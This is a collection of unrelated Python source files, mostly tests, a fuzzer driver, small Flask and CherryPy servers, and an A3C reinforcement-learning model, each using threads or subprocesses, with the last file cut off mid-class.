help="Path to directory where failing tests will be stored"
" (default: %default)")
o.add_option("--timeout", default=20, type="int",
help="Timeout for each fuzz test (in seconds, default:"
"%default)")
return o
def ProcessOptions(options, args):
options.save_path = os.path.expanduser(options.save_path)
if options.fuzz_target not in FUZZ_TARGET_LISTS:
print("Invalid fuzz target: %s" % options.fuzz_target)
return False
if len(args) != 1 or args[0] == "help":
return False
return True
def Main():
parser = BuildOptionParser()
(options, args) = parser.parse_args()
if not ProcessOptions(options, args):
parser.print_help()
return 1
action = args[0]
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
builtins = FindJSBuiltins()
if action == "test":
print("put your temporary debugging code here")
return 0
if action == "info":
print("%d functions total; js_fuzzable_functions: %d, "
"cctest_fuzzable_functions: %d, unknown_functions: %d"
% (len(functions), len(js_fuzzable_functions),
len(cctest_fuzzable_functions), len(unknown_functions)))
print("%d JavaScript builtins" % len(builtins))
print("unknown functions:")
for f in unknown_functions:
print(f)
return 0
if action == "check":
errors = 0
def CheckCount(actual, expected, description):
if len(actual) != expected:
print("Expected to detect %d %s, but found %d." % (
expected, description, len(actual)))
print("If this change is intentional, please update the expectations"
" at the top of %s." % THIS_SCRIPT)
return 1
return 0
errors += CheckCount(functions, EXPECTED_FUNCTION_COUNT,
"functions in total")
errors += CheckCount(js_fuzzable_functions, EXPECTED_FUZZABLE_COUNT,
"JavaScript-fuzzable functions")
errors += CheckCount(cctest_fuzzable_functions, EXPECTED_CCTEST_COUNT,
"cctest-fuzzable functions")
errors += CheckCount(unknown_functions, EXPECTED_UNKNOWN_COUNT,
"functions with incomplete type information")
errors += CheckCount(builtins, EXPECTED_BUILTINS_COUNT,
"JavaScript builtins")
def CheckTestcasesExisting(functions):
errors = 0
for f in functions:
if not os.path.isfile(os.path.join(BASEPATH, f.Filename())):
print("Missing testcase for %s, please run '%s generate'" %
(f.name, THIS_SCRIPT))
errors += 1
files = [filename for filename in os.listdir(BASEPATH)
if not filename.startswith(".")]
if len(files) != len(functions):
unexpected_files = set(files) - set([f.Filename() for f in functions])
for f in unexpected_files:
print("Unexpected testcase: %s" % os.path.join(BASEPATH, f))
errors += 1
print("Run '%s generate' to automatically clean these up."
% THIS_SCRIPT)
return errors
errors += CheckTestcasesExisting(js_fuzzable_functions)
def CheckNameClashes(runtime_functions, builtins):
errors = 0
runtime_map = {}
for f in runtime_functions:
runtime_map[f.name] = 1
for b in builtins:
if b.name in runtime_map:
print("Builtin/Runtime_Function name clash: %s" % b.name)
errors += 1
return errors
errors += CheckNameClashes(functions, builtins)
if errors > 0:
return 1
print("Generated runtime tests: all good.")
return 0
if action == "generate":
GenerateTestcases(js_fuzzable_functions)
return 0
if action == "fuzz":
processes = []
if not os.path.isdir(options.save_path):
os.makedirs(options.save_path)
stop_running = multiprocessing.Event()
for i in range(multiprocessing.cpu_count()):
args = (i, options, stop_running)
p = multiprocessing.Process(target=RunFuzzer, args=args)
p.start()
processes.append(p)
try:
for i in range(len(processes)):
processes[i].join()
except KeyboardInterrupt:
stop_running.set()
for i in range(len(processes)):
processes[i].join()
return 0
if __name__ == "__main__":
sys.exit(Main())
|
test_interactive.py
|
import time
from threading import Thread
import pytest
from pji.control import interactive_process, ResourceLimit, InteractiveProcess, RunResultStatus
# noinspection DuplicatedCode
@pytest.mark.unittest
class TestControlProcessInteractive:
def test_interactive_process_simple(self):
_before_start = time.time()
with interactive_process(
args="echo 233 && sleep 2 && echo 2334",
shell=True,
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
time.sleep(0.5)
assert _output == [b'233']
time.sleep(3)
assert _output == [b'233', b'2334']
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_with_env(self):
_before_start = time.time()
with interactive_process(
args="echo 233 && sleep 2 && echo ${ENV_TEST}",
shell=True,
environ={'ENV_TEST': '2334'},
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
time.sleep(0.5)
assert _output == [b'233']
time.sleep(3)
assert _output == [b'233', b'2334']
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_with_input(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'}
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(1.0)
assert _output == [b'233']
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233', b'233jsdf']
assert ip.result.result is None
assert ip.status == RunResultStatus.NOT_COMPLETED
assert not ip.ok
assert not ip.completed
ip.close_stdin()
ip.join()
_result = ip.result.result
assert ip.ok
assert ip.completed
assert ip.status == RunResultStatus.SUCCESS
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_rtle(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'},
resources=ResourceLimit(
max_real_time='2s',
)
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(2.0)
assert _output == [b'233']
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 9
def test_interactive_process_rtle_pass(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'},
resources=ResourceLimit(
max_real_time='4s',
)
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(2.0)
assert _output == [b'233']
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233', b'233jsdf']
assert ip.result.result is None
assert ip.result.status == RunResultStatus.NOT_COMPLETED
assert not ip.ok
assert not ip.completed
ip.close_stdin()
ip.join()
_result = ip.result.result
assert ip.ok
assert ip.completed
assert ip.status == RunResultStatus.SUCCESS
assert _result is not None
assert _result.ok
assert _result.exitcode == 0
assert _result.signal_code == 0
@pytest.mark.timeout(5.0)
def test_interactive_process_direct_close_1(self):
with interactive_process(
args="sh",
) as ip:
assert isinstance(ip, InteractiveProcess)
ip.print_stdin(b'echo 233')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'233'
ip.print_stdin(b'echo 2334')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'2334'
_result = ip.result.result
assert _result.ok
@pytest.mark.timeout(5.0)
def test_interactive_process_direct_close_2(self):
with interactive_process(
args="sh",
) as ip:
assert isinstance(ip, InteractiveProcess)
ip.print_stdin(b'echo 233')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'233'
ip.print_stdin(b'echo 2334')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'2334'
ip.close_stdin()
_result = ip.result.result
assert _result.ok
def test_interactive_process_wtf(self):
with pytest.raises(EnvironmentError):
with interactive_process(
args="what_the_fuck -c 'echo 233 && sleep 2 && echo 2334'",
):
pytest.fail('Should not reach here')
|
test_queue.py
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import queue
import time
import unittest
from test import support
threading = support.import_module('threading')
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def tearDown(self):
self.t = None
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not self.t.startedEvent.is_set():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
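# Typical use (mirroring the calls in simple_queue_test below):
#   self.do_blocking_test(q.get, (), q.put, ('empty',))
# blocks the main thread in q.get() until the trigger thread performs
# q.put('empty'), then returns the item that unblocked it.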
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTestMixin(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
self.assertTrue(q.empty())
self.assertFalse(q.full())
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(q.qsize(), "Queue should not be empty")
self.assertTrue(not qfull(q), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), "Queue should be full")
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0,1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(-1) # instruct the threads to close
q.join() # verify that you can join twice
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_simple_queue(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
# issue 10110
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2 # shrink the queue
with self.assertRaises(queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.Queue
class LifoQueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.LifoQueue
class PriorityQueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.PriorityQueue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception):
pass
class FailingQueue(queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException("You Lose")
return queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException("You Lose")
return queue.Queue._get(self)
class FailingQueueTest(BlockingTestMixin, unittest.TestCase):
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
q.get()
self.assertTrue(not qfull(q), "Queue should not be full")
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
def test_main():
support.run_unittest(QueueTest, LifoQueueTest, PriorityQueueTest,
FailingQueueTest)
if __name__ == "__main__":
test_main()
|
nr_example.py
|
#Copyright (c) 2017 Joseph D. Steinmeyer (jodalyst)
#Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#questions? email me at jodalyst@mit.edu
import time
import math
from threading import Thread, Lock
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit, join_room, leave_room,close_room, rooms, disconnect
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on available packages.
#async_mode = 'threading'
#async_mode = 'eventlet'
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
print('async_mode is ' + async_mode)
# monkey patching is necessary because this application uses a background
# thread
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
#Start up Flask server:
app = Flask(__name__, template_folder='./', static_url_path='/static')
app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
socketio = SocketIO(app, async_mode=async_mode)
thread = None
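# dataThread pushes two sine waves over Socket.IO: channel 'update_125'
# every iteration (~50 Hz given the 0.02 s sleep) and 'update_126' every
# fifth iteration (~10 Hz); the ids 125/126 are hard-coded below and
# presumably match listeners in numerical_reporter_example.html.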
def dataThread():
unique3 = 125
unique4 = 126
amp1 = 50
amp2 = 12
omega1 = 10
omega2 = 30
count = 0
print("start running")
while True:
val1 = amp1*math.sin(omega1*time.time())
val2 = amp2*math.sin(omega2*time.time())
socketio.emit('update_{}'.format(unique3), val1, broadcast=True)
if count%5 == 0:
socketio.emit('update_{}'.format(unique4), val2, broadcast=True)
count+=1
print('sending')
time.sleep(0.02)
@app.route('/')
def index():
global thread
print ("A user connected")
if thread is None:
thread = Thread(target=dataThread)
thread.daemon = True
thread.start()
return render_template('numerical_reporter_example.html')
if __name__ == '__main__':
socketio.run(app, port=3000, debug=True)
|
emails.py
|
from flask_mail import Message
from . import mail
from flask import current_app, render_template
from threading import Thread
def send_async_mail(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(to,subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MAIL_SUBJECT_PREFIX'] + subject, sender=app.config['MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_mail, args=[app, msg])
thr.start()
return thr
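# Usage sketch (the template name and context keys here are hypothetical
# and must exist in your app):
#   send_mail('user@example.com', 'Confirm Your Account',
#             'auth/email/confirm', user=user, token=token)
# renders auth/email/confirm.txt and auth/email/confirm.html with the
# given context and sends the message on a background thread so the
# request handler is not blocked.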
|
server.py
|
import cherrypy
from cherrypy.lib.static import serve_file
import os
import sys
import webbrowser
import threading
import time
import socket
import json
from client import addClient, loadClients, clearClients, clientsList, removeClient
from transmitJSON import sendJSON, recvJSON
def getRootDir():
return os.path.dirname(os.path.abspath(sys.argv[0]))
def manageClient(client, addr):
data = recvJSON(client)
data['ip']=addr[0]
try:
addClient(data)
sendJSON(client, {'ok': True})
except ValueError as e:
sendJSON(client, {'ok': False, 'error': str(e)})
finally:
client.close()
def subscribeHandler():
s = socket.socket()
s.settimeout(0.5)
s.bind(('0.0.0.0', 3001))
s.listen()
print('listening for subscriptions on port', 3001)
while running:
try:
client, addr = s.accept()
manageClient(client, addr)
except socket.timeout:
pass
print('no longer listening for subscriptions')
def startBrowser():
time.sleep(2)
webbrowser.open('http://localhost:3000')
print('browser started!')
class Server:
@cherrypy.expose(['game.js'])
def game(self):
cherrypy.response.headers['Content-Type'] = 'application/javascript'
return gameJS
@cherrypy.expose
@cherrypy.tools.json_out()
def clients(self):
return clientsList()
@cherrypy.expose
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
def remove(self):
data = cherrypy.request.json
removeClient(data['name'])
if __name__ == '__main__':
if len(sys.argv) > 1:
game = sys.argv[1]
else:
game = 'matches'
with open(os.path.join(getRootDir(),f'public/games/{game}.js')) as file:
gameJS = file.read().encode('utf8')
running = True
threading.Thread(target=startBrowser).start()
thread = threading.Thread(target=subscribeHandler)
thread.start()
def stop():
print('STOPPING subscription handler...')
global running
running = False
thread.join()
print('subscription handler stopped')
loadClients()
cherrypy.engine.subscribe('stop', stop)
cherrypy.quickstart(Server(), '', 'server.conf')
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return 'Wrong place. Go to discord to interact with bot.'
def run():
app.run(host='0.0.0.0',port=3333)
def keep_alive():
t = Thread(target=run)
t.start()
|
test_request_safety.py
|
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import asyncio
import aiohttp_jinja2
from urllib import request
from aiohttp.test_utils import unittest_run_loop
from oteltrace.pin import Pin
from oteltrace.provider import DefaultContextProvider
from oteltrace.contrib.aiohttp.patch import patch, unpatch
from oteltrace.contrib.aiohttp.middlewares import trace_app
from .utils import TraceTestCase
class TestAiohttpSafety(TraceTestCase):
"""
Ensure that if the ``AsyncioTracer`` is not properly configured,
bad traces are produced but the ``Context`` object will not
leak memory.
"""
def enable_tracing(self):
# aiohttp TestCase with the wrong context provider
trace_app(self.app, self.tracer)
patch()
Pin.override(aiohttp_jinja2, tracer=self.tracer)
self.tracer.configure(context_provider=DefaultContextProvider())
def disable_tracing(self):
unpatch()
@unittest_run_loop
@asyncio.coroutine
def test_full_request(self):
# it should create a root span when there is a handler hit
# with the proper tags
request = yield from self.client.request('GET', '/template/')
assert 200 == request.status
yield from request.text()
# the trace is created
traces = self.tracer.writer.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
request_span = traces[0][0]
template_span = traces[0][1]
# request
assert 'aiohttp-web' == request_span.service
assert 'aiohttp.request' == request_span.name
assert 'GET /template/' == request_span.resource
# template
assert 'aiohttp-web' == template_span.service
assert 'aiohttp.template' == template_span.name
assert 'aiohttp.template' == template_span.resource
@unittest_run_loop
@asyncio.coroutine
def test_multiple_full_request(self):
NUMBER_REQUESTS = 10
responses = []
# it should produce a wrong trace, but the Context must
# be finished
def make_requests():
url = self.client.make_url('/delayed/')
response = request.urlopen(str(url)).read().decode('utf-8')
responses.append(response)
# blocking call executed in different threads
ctx = self.tracer.get_call_context()
threads = [threading.Thread(target=make_requests) for _ in range(NUMBER_REQUESTS)]
for t in threads:
t.start()
# yield back to the event loop until all requests are processed
while len(responses) < NUMBER_REQUESTS:
yield from asyncio.sleep(0.001)
for response in responses:
assert 'Done' == response
for t in threads:
t.join()
# the trace is wrong but the Context is finished
spans = self.tracer.writer.pop()
assert NUMBER_REQUESTS == len(spans)
assert 0 == len(ctx._trace)
|
A3C_Allocation.py
|
from tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file
import threading
import multiprocessing
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow.contrib.slim as slim
import os
import scipy.signal
import scipy.misc  # imresize is used below when saving episode gifs
import pandas as pd
from model.helper import *
from model.trained_transporter import Transporter
from simulater.Environment import Environment
from random import choice
from time import sleep
from time import time
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target_graph(from_scope,to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var,to_var in zip(from_vars,to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
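# Sketch: each worker builds these assign ops once and re-runs them to
# resynchronize before every episode:
#   update_ops = update_target_graph('global_Alloc', worker_scope)
#   sess.run(update_ops)  # copy global parameters into the local network
# (see self.update_local_ops and sess.run(self.update_local_ops) below)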
# Flattens an observation frame into a 1-D vector (the original Doom
# crop/resize preprocessing is preserved below, commented out).
def process_frame(frame):
'''
s = frame[10:-10,30:-30]
s = scipy.misc.imresize(s,[84,84])
s = np.reshape(s,[np.prod(s.shape)]) / 255.0
'''
s = frame.flatten()
return s
# Discounting function used to calculate discounted returns.
def discount(x, gamma):
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
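# lfilter([1], [1, -gamma], x[::-1]) computes y[n] = x[n] + gamma * y[n-1]
# over the reversed sequence, i.e. the discounted return
# G_t = sum_k gamma**k * x[t+k]. For example, discount([1., 1., 1.], 0.9)
# returns [2.71, 1.9, 1.].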
#Used to initialize weights for policy and value output layers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
class AC_Network():
def __init__(self, s_size, a_size, scope, trainer):
with tf.variable_scope(scope):
# Input and visual encoding layers
self.inputs = tf.placeholder(shape=[None, s_size], dtype=tf.float32)
self.imageIn = tf.reshape(self.inputs, shape=[-1, height, width, 1])
self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.imageIn, num_outputs=16,
kernel_size=[2, 2], stride=[1, 1], padding='SAME')
self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.conv1, num_outputs=32,
kernel_size=[2, 2], stride=[1, 1], padding='SAME')
hidden = slim.fully_connected(slim.flatten(self.conv2), 256, activation_fn=tf.nn.elu)
# Recurrent network for temporal dependencies
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)
c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
self.state_in = (c_in, h_in)
rnn_in = tf.expand_dims(hidden, [0])
step_size = tf.shape(self.imageIn)[:1]
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
rnn_out = tf.reshape(lstm_outputs, [-1, 256])
# Output layers for policy and value estimations
self.policy = slim.fully_connected(rnn_out, a_size,
activation_fn=tf.nn.softmax,
weights_initializer=normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = slim.fully_connected(rnn_out, 1,
activation_fn=None,
weights_initializer=normalized_columns_initializer(1.0),
biases_initializer=None)
# Only the worker network need ops for loss functions and gradient updating.
if scope != 'global_Alloc':
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
self.actions_onehot = tf.one_hot(self.actions, a_size, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
